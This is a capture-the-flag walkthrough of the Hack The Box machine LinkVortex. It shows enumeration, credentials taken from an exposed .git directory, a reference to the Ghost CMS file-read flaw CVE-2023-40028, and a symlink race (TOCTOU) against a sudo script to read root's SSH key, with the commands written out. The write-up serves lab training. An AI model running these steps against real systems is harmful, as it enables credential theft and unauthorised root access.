LinkVortex is a linux easy machine created by . The Ghost CMS is used in linkvortex.htb domain. The dev subdomain is found during fuzzing and .git directory is present. The content of .git directory is dumped and password for Ghost CMS login is retrieved. The version of Ghost CMS used is 5.58.0 which is vulnerable to CVE-2023-40028 arbitrary file read vulnerability, with which the foothold is gained. The user has a privilege to run clean_symbolic.sh script file as sudo which creates the TOCTOU vulnerability and exploiting it gives us the id_rsa of root.
OS
Difficulty
Points
Release Date
Retired Date
Linux
Easy
20
07-12-2024
12-04-2025
Enumeration
Nmap
Starting the nmap scan and found ssh and http services running.
nmap -Pn -sC -sV --min-rate=1000 10.10.11.47
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-20 21:03 EDT
Nmap scan report for 10.10.11.47
Host is up (8.0s latency).
Not shown: 749 filtered tcp ports (no-response), 249 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open tcpwrapped
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug)
80/tcp open tcpwrapped
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://linkvortex.htb/
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.18 seconds
Add linkvortex.htb in /etc/hosts file.
Web - linkvortex.htb
The linkvortex is the blogging site where computer parts information is given in details.
The footer reveals that the site is using Ghost CMS and going to ghost directory gives us the ghost login page.
Fuzzing
Subdomain fuzzing found the dev.linkvortex.htb subdomain.
git status
Not currently on any branch.
Changes to be committed:
(use "git restore --staged <file>..." to unstage)
new file: Dockerfile.ghost
modified: ghost/core/test/regression/api/admin/authentication.test.js
The ghost/core/test/regression/api/admin/authentication.test.js has been changed and not committed yet.
ssh bob@10.10.11.47
The authenticity of host '10.10.11.47 (10.10.11.47)' can't be established.
ED25519 key fingerprint is SHA256:vrkQDvTUj3pAJVT+1luldO6EvxgySHoV6DPCcat0WkI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.47' (ED25519) to the list of known hosts.
bob@10.10.11.47's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Apr 21 08:29:20 2025 from 10.10.14.46
bob@linkvortex:~$
Privilege Escalation
Pillaging - bob [ user ]
The sudo -l command reveals that the user bob has a sudo privilege to run the /usr/bin/bash /opt/ghost/clean_symlink.sh *.png command.
bob@linkvortex:~$ sudo -l
Matching Defaults entries for bob on linkvortex:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty, env_keep+=CHECK_CONTENT
User bob may run the following commands on linkvortex:
(ALL) NOPASSWD: /usr/bin/bash /opt/ghost/clean_symlink.sh *.png
bob@linkvortex:~$
We don't have write permission over clean_symlink.sh file.
bob@linkvortex:~$ ls -la /opt/ghost/clean_symlink.sh
-rwxr--r-- 1 root root 745 Nov 1 08:46 /opt/ghost/clean_symlink.sh
bob@linkvortex:~$
File - clean_symlink.sh
clean_symlink.sh
#!/bin/bash
QUAR_DIR="/var/quarantined"
if [ -z $CHECK_CONTENT ];then
CHECK_CONTENT=false
fi
LINK=$1
if ! [[ "$LINK" =~ \.png$ ]]; then
/usr/bin/echo "! First argument must be a png file !"
exit 2
fi
if /usr/bin/sudo /usr/bin/test -L $LINK;then
LINK_NAME=$(/usr/bin/basename $LINK)
LINK_TARGET=$(/usr/bin/readlink $LINK)
if /usr/bin/echo "$LINK_TARGET" | /usr/bin/grep -Eq '(etc|root)';then
/usr/bin/echo "! Trying to read critical files, removing link [ $LINK ] !"
/usr/bin/unlink $LINK
else
/usr/bin/echo "Link found [ $LINK ] , moving it to quarantine"
/usr/bin/mv $LINK $QUAR_DIR/
if $CHECK_CONTENT;then
/usr/bin/echo "Content:"
/usr/bin/cat $QUAR_DIR/$LINK_NAME 2>/dev/null
fi
fi
fi
The script takes the .png file as a argument and checks whether it is symbolic link or not.
It also inspects the link target whether it points to /etc or /root directories.
If it points to those directories it unlink the file otherwise it moves to a quarantine folder /var/quarantined and if the $CHECK_CONTENT variable is set to TRUE, it prints the contents of the linked file.
Shell - root [ TOCTOU ]
Methodology
The time-of-check-time-of-use vulnerability occurs after the symbolic link is created. We can quickly swap the link target to other sensitive files and directories like /etc and /root. If the $CHECK_CONTENT variable is set to TRUE, we can also print the content of the files.
Exploit
1
Forcing symbolic link
Running while loop to force the symbolic link if the file already exists.
bob@linkvortex:~$ while true; do ln -sf /root/.ssh/id_rsa /var/quarantined/exp.png; done
2
Getting id_rsa
Creating another symbolic link in another folder with the same png file name and executing the clean_symlink.sh moves the file into quarantined folder and SSH private key is printed.
Copy the private key and save into the file. Change the permission and ssh as a root.
chmod 600 id_rsa
ssh -i id_rsa root@10.10.11.47
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 6.5.0-27-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/pro
This system has been minimized by removing packages and content that are
not required on a system that users do not log into.
To restore this content, you can run the 'unminimize' command.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Mon Dec 2 11:20:43 2024 from 10.10.14.61
root@linkvortex:~#
If libcrypto error occurs remove the unwanted space from the id_rsa file.
Proof of Concept
The below video provides the PoC of LinkVortex machine.
Ghost version < 5.59.1 is vulnerable to CVE-2023-40028 arbitrary file read vulnerability. The PoC with bash script is created in this github .
Affected versions of this package are vulnerable to Arbitrary File Read which allows authenticated users to upload files that are symlinks. This can be exploited to perform an arbitrary file read of any file on the host operating system. More details can be found .
